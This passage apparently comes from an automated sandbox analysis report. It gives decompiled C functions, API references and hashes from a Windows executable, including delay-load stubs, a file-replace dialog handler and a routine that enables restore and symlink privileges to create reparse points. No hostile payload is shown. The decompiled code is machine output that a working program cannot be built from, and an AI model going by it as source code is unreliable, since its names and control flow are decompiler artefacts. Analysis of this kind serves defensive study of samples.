                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: db0c75d00fd1e50db3d612642279b8f7e9d685322ccbf63669981bbf1b953bb4
                • Instruction ID: 469deb3378aff060a86f8fc6c7c97c3bcb10d5423d74ee2611e2829e36e59bd5
                • Opcode Fuzzy Hash: db0c75d00fd1e50db3d612642279b8f7e9d685322ccbf63669981bbf1b953bb4
                • Instruction Fuzzy Hash: BDA011E22A8002BC3008B202AC02CBB020CC0C0B38B3088ABF00388080B880080A203A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00CBD1EC() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                
                				_push(0xcdab6c); // executed
                				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
                				goto __eax;
                			}








                0x00cbd1b1
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a490df2805973a35ff79708d4c4fc712a89ac73f5477d5b80e97d87cf8ecb59d
                • Instruction ID: 469deb3378aff060a86f8fc6c7c97c3bcb10d5423d74ee2611e2829e36e59bd5
                • Opcode Fuzzy Hash: a490df2805973a35ff79708d4c4fc712a89ac73f5477d5b80e97d87cf8ecb59d
                • Instruction Fuzzy Hash: BDA011E22A8002BC3008B202AC02CBB020CC0C0B38B3088ABF00388080B880080A203A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00CBD1F6() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                
                				_push(0xcdab6c); // executed
                				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
                				goto __eax;
                			}








                0x00cbd1b1
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 9ca2103ae4dc46ae37119b505a1173060d73312c3e97c0945257dd7f914ce5ea
                • Instruction ID: 469deb3378aff060a86f8fc6c7c97c3bcb10d5423d74ee2611e2829e36e59bd5
                • Opcode Fuzzy Hash: 9ca2103ae4dc46ae37119b505a1173060d73312c3e97c0945257dd7f914ce5ea
                • Instruction Fuzzy Hash: BDA011E22A8002BC3008B202AC02CBB020CC0C0B38B3088ABF00388080B880080A203A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00CBD200() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                
                				_push(0xcdab6c); // executed
                				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
                				goto __eax;
                			}








                0x00cbd1b1
                0x00cbd1b6
                0x00cbd1bd

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD1B6
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4e79facfa36df3673f45d2790026e281c44e6a99e10290561133be4a41f2d1de
                • Instruction ID: 469deb3378aff060a86f8fc6c7c97c3bcb10d5423d74ee2611e2829e36e59bd5
                • Opcode Fuzzy Hash: 4e79facfa36df3673f45d2790026e281c44e6a99e10290561133be4a41f2d1de
                • Instruction Fuzzy Hash: BDA011E22A8002BC3008B202AC02CBB020CC0C0B38B3088ABF00388080B880080A203A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00CBD22F() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                
                				_push(0xcdab8c); // executed
                				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
                				goto __eax;
                			}








                0x00cbd212
                0x00cbd217
                0x00cbd21e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 85f900e649889bdebce95d47a41b250154ec72c283287be2896903cfe13442c5
                • Instruction ID: 199250cd1cbf159d7b82bcd51202444e7a3003bfcf321d393df6ac18ed953c41
                • Opcode Fuzzy Hash: 85f900e649889bdebce95d47a41b250154ec72c283287be2896903cfe13442c5
                • Instruction Fuzzy Hash: 83A011EA2AA002BC300822A2AC02CBB030CC0C0B38B30882BF00380080B8808C0A2032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00CBD225() {
                				void* _t2;
                				void* _t3;
                				void* _t6;
                				void* _t7;
                				void* _t8;
                
                				_push(0xcdab8c); // executed
                				E00CBD53A(_t2, _t3, _t6, _t7, _t8); // executed
                				goto __eax;
                			}








                0x00cbd212
                0x00cbd217
                0x00cbd21e

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 00CBD217
                  • Part of subcall function 00CBD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBD5B7
                  • Part of subcall function 00CBD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBD5C8
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: c49ec85e93f2f4e0c18a1f7f18e7fd14299c3bc4c8779de50b4f9b0dced43717
                • Instruction ID: 199250cd1cbf159d7b82bcd51202444e7a3003bfcf321d393df6ac18ed953c41
                • Opcode Fuzzy Hash: c49ec85e93f2f4e0c18a1f7f18e7fd14299c3bc4c8779de50b4f9b0dced43717
                • Instruction Fuzzy Hash: 83A011EA2AA002BC300822A2AC02CBB030CC0C0B38B30882BF00380080B8808C0A2032
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CA9BD6(void* __ecx) {
                				int _t2;
                
                				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
                				asm("sbb eax, eax");
                				return  ~(_t2 - 1) + 1;
                			}




                0x00ca9bd9
                0x00ca9be2
                0x00ca9be5

                APIs
                • SetEndOfFile.KERNELBASE(?,00CA8F33,?,?,-00001960), ref: 00CA9BD9
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: File
                • String ID:
                • API String ID: 749574446-0
                • Opcode ID: 7c94639141b0f782d1ff7c78e48d60ffc6e26e46faf319ff92462d0b6d8ab29c
                • Instruction ID: 8236841d5a15850eda7fc113814cda8051b9ea5198ff99c04ebf8b73ab3e07ea
                • Opcode Fuzzy Hash: 7c94639141b0f782d1ff7c78e48d60ffc6e26e46faf319ff92462d0b6d8ab29c
                • Instruction Fuzzy Hash: 33B011300A200A8A8E002B30CC08A283B22EA2230A30082A0A002CA0A8CB22C003AA00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00CB9A8D(WCHAR* _a4) {
                				signed int _t2;
                
                				_t2 = SetCurrentDirectoryW(_a4); // executed
                				asm("sbb eax, eax");
                				return  ~( ~_t2);
                			}




                0x00cb9a91
                0x00cb9a99
                0x00cb9a9d

                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,00CB9CE4,C:\Users\user\Desktop,00000000,00CE85FA,00000006), ref: 00CB9A91
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: ed978ca703ede180ad8375e6b8144ad935ab68144a74a61df71860f61abfbe04
                • Instruction ID: 2a60a7f9cdbc7e7d36af842965fe85b1fd54a74c2fc600132d39d0f02fe602df
                • Opcode Fuzzy Hash: ed978ca703ede180ad8375e6b8144ad935ab68144a74a61df71860f61abfbe04
                • Instruction Fuzzy Hash: 04A01230195006468A000B30CC09D1D77515770702F00C6217102C00A0CB308C10A500
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 60%
                			E00CBAFB9(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
                				struct _FILETIME _v0;
                				struct _SYSTEMTIME _v12;
                				struct _SYSTEMTIME _v16;
                				struct _FILETIME _v24;
                				void* _t73;
                				void* _t136;
                				long _t137;
                				void* _t141;
                				void* _t142;
                				void* _t143;
                				void* _t144;
                				void* _t145;
                				signed short _t148;
                				void* _t151;
                				intOrPtr _t152;
                				signed int _t153;
                				signed int _t157;
                				struct HWND__* _t159;
                				intOrPtr _t162;
                				void* _t163;
                				int _t166;
                				int _t169;
                				void* _t173;
                				void* _t177;
                				void* _t179;
                
                				_t156 = __edx;
                				_t151 = __ecx;
                				E00CBD940();
                				_t148 = _a6748;
                				_t162 = _a6744;
                				_t159 = _a6740;
                				if(E00CA12D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
                					_t163 = _t162 - 0x110;
                					if(_t163 == 0) {
                						SetFocus(GetDlgItem(_t159, 0x6c));
                						E00CAFAB1( &_a2640, _a6752, 0x800);
                						E00CABA19( &_a2628,  &_a2628, 0x800);
                						SetDlgItemTextW(_t159, 0x65,  &_a2616);
                						 *0xcddf00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
                						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
                						_t173 = FindFirstFileW( &_a2596,  &_a288);
                						if(_t173 != 0xffffffff) {
                							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
                							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
                							_push(0x32);
                							_push( &_a12);
                							_push(0);
                							_push( &_v12);
                							_t166 = 2;
                							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
                							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
                							_push( &_a12);
                							_push( &_a112);
                							E00CA3E41( &_a900, 0x200, L"%s %s %s", E00CADA42(_t151, 0x99));
                							_t179 = _t177 + 0x18;
                							SetDlgItemTextW(_t159, 0x6a,  &_a900);
                							FindClose(_t173);
                							if((_a308 & 0x00000010) == 0) {
                								_push(0x32);
                								_push( &_a212);
                								_push(0);
                								_pop(0);
                								asm("adc eax, ebp");
                								_push(_a340);
                								_push(0 + _a344);
                								E00CB9D99();
                								_push(E00CADA42(0 + _a344, 0x98));
                								E00CA3E41( &_a884, 0x200, L"%s %s",  &_a192);
                								_t179 = _t179 + 0x14;
                								SetDlgItemTextW(_t159, 0x68,  &_a884);
                							}
                							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
                							_t152 =  *0xce75f4; // 0x0
                							E00CB082F(_t152, _t156,  &_a4);
                							FileTimeToLocalFileTime( &_v0,  &_v24);
                							FileTimeToSystemTime( &_v24,  &_v16);
                							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
                							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
                							_push( &_a8);
                							_push( &_a108);
                							E00CA3E41( &_a896, 0x200, L"%s %s %s", E00CADA42(_t152, 0x99));
                							_t177 = _t179 + 0x18;
                							SetDlgItemTextW(_t159, 0x6b,  &_a896);
                							_t153 =  *0xcfce14;
                							_t157 =  *0xcfce10;
                							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
                								E00CB9D99(_t157, _t153,  &_a212, 0x32);
                								_push(E00CADA42(_t153, 0x98));
                								E00CA3E41( &_a884, 0x200, L"%s %s",  &_a192);
                								_t177 = _t177 + 0x14;
                								SetDlgItemTextW(_t159, 0x69,  &_a884);
                							}
                						}
                						L27:
                						_t73 = 0;
                						L28:
                						return _t73;
                					}
                					if(_t163 != 1) {
                						goto L27;
                					}
                					_t169 = 2;
                					_t136 = (_t148 & 0x0000ffff) - _t169;
                					if(_t136 == 0) {
                						L11:
                						_push(6);
                						L12:
                						_pop(_t169);
                						L13:
                						_t137 = SendDlgItemMessageW(_t159, 0x66, 0x171, 0, 0);
                						if(_t137 != 0) {
                							 *0xcddf4c(_t137);
                						}
                						EndDialog(_t159, _t169);
                						goto L1;
                					}
                					_t141 = _t136 - 0x6a;
                					if(_t141 == 0) {
                						_t169 = 0;
                						goto L13;
                					}
                					_t142 = _t141 - 1;
                					if(_t142 == 0) {
                						_t169 = 1;
                						goto L13;
                					}
                					_t143 = _t142 - 1;
                					if(_t143 == 0) {
                						_push(4);
                						goto L12;
                					}
                					_t144 = _t143 - 1;
                					if(_t144 == 0) {
                						goto L13;
                					}
                					_t145 = _t144 - 1;
                					if(_t145 == 0) {
                						_push(3);
                						goto L12;
                					}
                					if(_t145 != 1) {
                						goto L27;
                					}
                					goto L11;
                				}
                				L1:
                				_t73 = 1;
                				goto L28;
                			}





























                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CBB04A
                • EndDialog.USER32(?,00000006), ref: 00CBB05D
                • GetDlgItem.USER32(?,0000006C), ref: 00CBB079
                • SetFocus.USER32(00000000), ref: 00CBB080
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CBB0C0
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CBB0F3
                • FindFirstFileW.KERNEL32(?,?), ref: 00CBB109
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CBB127
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBB137
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBB154
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBB172
                • _swprintf.LIBCMT ref: 00CBB1A2
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CBB1B5
                • FindClose.KERNEL32(00000000), ref: 00CBB1B8
                • _swprintf.LIBCMT ref: 00CBB213
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CBB226
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CBB23C
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CBB25C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBB26C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBB286
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBB29E
                • _swprintf.LIBCMT ref: 00CBB2CF
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CBB2E2
                • _swprintf.LIBCMT ref: 00CBB332
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CBB345
                  • Part of subcall function 00CB9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CB9DBF
                  • Part of subcall function 00CB9D99: GetNumberFormatW.KERNEL32 ref: 00CB9E0E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                • API String ID: 797121971-1840816070
                • Opcode ID: 736b343f4d12717c9899f53a7f2d059fdc389cc2d623b17c2bdec1d6a9b21ffe
                • Instruction ID: 9bc257b8e29a08b5842edd78b1ea1d6bd5a014d5e66de80d42cd9eff44898d65
                • Opcode Fuzzy Hash: 736b343f4d12717c9899f53a7f2d059fdc389cc2d623b17c2bdec1d6a9b21ffe
                • Instruction Fuzzy Hash: 3D91A4B2648349BBD231EBA0DD49FFF77ACEB89704F00481AB746D6081D771AA049762
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00CA6FC6(void* __edx) {
                				void* __esi;
                				signed int _t111;
                				signed int _t113;
                				void* _t116;
                				int _t118;
                				intOrPtr _t121;
                				signed int _t139;
                				int _t145;
                				void* _t182;
                				void* _t185;
                				void* _t190;
                				short _t191;
                				void* _t197;
                				void* _t202;
                				void* _t203;
                				void* _t222;
                				void* _t223;
                				intOrPtr _t224;
                				intOrPtr _t226;
                				void* _t228;
                				WCHAR* _t229;
                				intOrPtr _t233;
                				short _t237;
                				void* _t238;
                				intOrPtr _t239;
                				short _t241;
                				void* _t242;
                				void* _t244;
                				void* _t245;
                
                				_t223 = __edx;
                				E00CBD870(E00CD126D, _t242);
                				E00CBD940();
                				 *((intOrPtr*)(_t242 - 0x18)) = 1;
                				if( *0xce0043 == 0) {
                					E00CA7A15(L"SeRestorePrivilege");
                					E00CA7A15(L"SeCreateSymbolicLinkPrivilege");
                					 *0xce0043 = 1;
                				}
                				_t199 = _t242 - 0x2c;
                				E00CA6ED7(_t242 - 0x2c, 0x1418);
                				_t197 =  *(_t242 + 0x10);
                				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
                				E00CAFAB1(_t242 - 0x107c, _t197 + 0x1104, 0x800);
                				 *((intOrPtr*)(_t242 - 0x10)) = E00CC2B33(_t242 - 0x107c);
                				_t232 = _t242 - 0x107c;
                				_t228 = _t242 - 0x207c;
                				_t111 = E00CC4DA0(_t242 - 0x107c, L"\\??\\", 4);
                				_t245 = _t244 + 0x10;
                				asm("sbb al, al");
                				_t113 =  ~_t111 + 1;
                				 *(_t242 - 0x14) = _t113;
                				if(_t113 != 0) {
                					_t232 = _t242 - 0x1074;
                					_t190 = E00CC4DA0(_t242 - 0x1074, L"UNC\\", 4);
                					_t245 = _t245 + 0xc;
                					if(_t190 == 0) {
                						_t191 = 0x5c;
                						 *((short*)(_t242 - 0x207c)) = _t191;
                						_t228 = _t242 - 0x207a;
                						_t232 = _t242 - 0x106e;
                					}
                				}
                				E00CC4D7E(_t228, _t232);
                				_t116 = E00CC2B33(_t242 - 0x207c);
                				_t233 =  *((intOrPtr*)(_t242 + 8));
                				_t229 =  *(_t242 + 0xc);
                				 *(_t242 + 0x10) = _t116;
                				if( *((char*)(_t233 + 0x618f)) != 0) {
                					L9:
                					_push(1);
                					_push(_t229);
                					E00CA9D3A(_t199, _t242);
                					if( *((char*)(_t197 + 0x10f1)) != 0 ||  *((char*)(_t197 + 0x2104)) != 0) {
                						_t118 = CreateDirectoryW(_t229, 0);
                						__eflags = _t118;
                						if(_t118 == 0) {
                							goto L27;
                						}
                						goto L14;
                					} else {
                						_t182 = CreateFileW(_t229, 0x40000000, 0, 0, 1, 0x80, 0);
                						if(_t182 == 0xffffffff) {
                							L27:
                							 *((char*)(_t242 - 0x18)) = 0;
                							L28:
                							E00CA159C(_t242 - 0x2c);
                							 *[fs:0x0] =  *((intOrPtr*)(_t242 - 0xc));
                							return  *((intOrPtr*)(_t242 - 0x18));
                						}
                						CloseHandle(_t182);
                						L14:
                						_t121 =  *((intOrPtr*)(_t197 + 0x1100));
                						if(_t121 != 3) {
                							__eflags = _t121 - 2;
                							if(_t121 == 2) {
                								L18:
                								_t202 =  *(_t242 - 0x2c);
                								_t224 =  *((intOrPtr*)(_t242 - 0x10));
                								 *_t202 = 0xa000000c;
                								_t237 = _t224 + _t224;
                								 *((short*)(_t202 + 0xa)) = _t237;
                								 *((short*)(_t202 + 4)) = 0x10 + ( *(_t242 + 0x10) + _t224) * 2;
                								 *((intOrPtr*)(_t202 + 6)) = 0;
                								E00CC4D7E(_t202 + 0x14, _t242 - 0x107c);
                								_t60 = _t237 + 2; // 0x3
                								_t238 =  *(_t242 - 0x2c);
                								 *((short*)(_t238 + 0xc)) = _t60;
                								 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
                								E00CC4D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 0xb) * 2, _t242 - 0x207c);
                								_t139 =  *(_t242 - 0x14) & 0x000000ff ^ 0x00000001;
                								__eflags = _t139;
                								 *(_t238 + 0x10) = _t139;
                								L19:
                								_t203 = CreateFileW(_t229, 0xc0000000, 0, 0, 3, 0x2200000, 0);
                								 *(_t242 + 0x10) = _t203;
                								if(_t203 == 0xffffffff) {
                									goto L27;
                								}
                								_t145 = DeviceIoControl(_t203, 0x900a4, _t238, ( *(_t238 + 4) & 0x0000ffff) + 8, 0, 0, _t242 - 0x30, 0);
                								_t262 = _t145;
                								if(_t145 != 0) {
                									E00CA943C(_t242 - 0x30a0);
                									 *(_t242 - 4) = 1;
                									 *((intOrPtr*)( *((intOrPtr*)(_t242 - 0x30a0)) + 8))();
                									_t239 =  *((intOrPtr*)(_t242 + 8));
                									 *(_t242 - 0x309c) =  *(_t242 + 0x10);
                									asm("sbb ecx, ecx");
                									asm("sbb ecx, ecx");
                									asm("sbb ecx, ecx");
                									E00CA9A7E(_t242 - 0x30a0, _t239,  ~( *(_t239 + 0x72c8)) & _t197 + 0x00001040,  ~( *(_t239 + 0x72cc)) & _t197 + 0x00001048,  ~( *(_t239 + 0x72d0)) & _t197 + 0x00001050);
                									E00CA94DA(_t242 - 0x30a0);
                									__eflags =  *((char*)(_t239 + 0x61a0));
                									if( *((char*)(_t239 + 0x61a0)) == 0) {
                										E00CAA12F(_t229,  *((intOrPtr*)(_t197 + 0x24)));
                									}
                									E00CA946E(_t242 - 0x30a0);
                									goto L28;
                								}
                								CloseHandle( *(_t242 + 0x10));
                								E00CA6BF5(_t262, 0x15, 0, _t229);
                								_t160 = GetLastError();
                								if(_t160 == 5 || _t160 == 0x522) {
                									if(E00CAFC98() == 0) {
                										E00CA1567(_t242 - 0x7c, 0x18);
                										_t160 = E00CB0A9F(_t242 - 0x7c);
                									}
                								}
                								E00CBE214(_t160);
                								E00CA6E03(0xce00e0, 9);
                								_push(_t229);
                								if( *((char*)(_t197 + 0x10f1)) == 0) {
                									DeleteFileW();
                								} else {
                									RemoveDirectoryW();
                								}
                								goto L27;
                							}
                							__eflags = _t121 - 1;
                							if(_t121 != 1) {
                								goto L27;
                							}
                							goto L18;
                						}
                						_t222 =  *(_t242 - 0x2c);
                						_t226 =  *((intOrPtr*)(_t242 - 0x10));
                						 *_t222 = 0xa0000003;
                						_t241 = _t226 + _t226;
                						 *((short*)(_t222 + 0xa)) = _t241;
                						 *((short*)(_t222 + 4)) = 0xc + ( *(_t242 + 0x10) + _t226) * 2;
                						 *((intOrPtr*)(_t222 + 6)) = 0;
                						E00CC4D7E(_t222 + 0x10, _t242 - 0x107c);
                						_t40 = _t241 + 2; // 0x3
                						_t238 =  *(_t242 - 0x2c);
                						 *((short*)(_t238 + 0xc)) = _t40;
                						 *((short*)(_t238 + 0xe)) =  *(_t242 + 0x10) +  *(_t242 + 0x10);
                						E00CC4D7E(_t238 + ( *((intOrPtr*)(_t242 - 0x10)) + 9) * 2, _t242 - 0x207c);
                						goto L19;
                					}
                				}
                				if( *(_t242 - 0x14) != 0) {
                					goto L27;
                				}
                				_t185 = E00CAB4F2(_t197 + 0x1104);
                				_t255 = _t185;
                				if(_t185 != 0) {
                					goto L27;
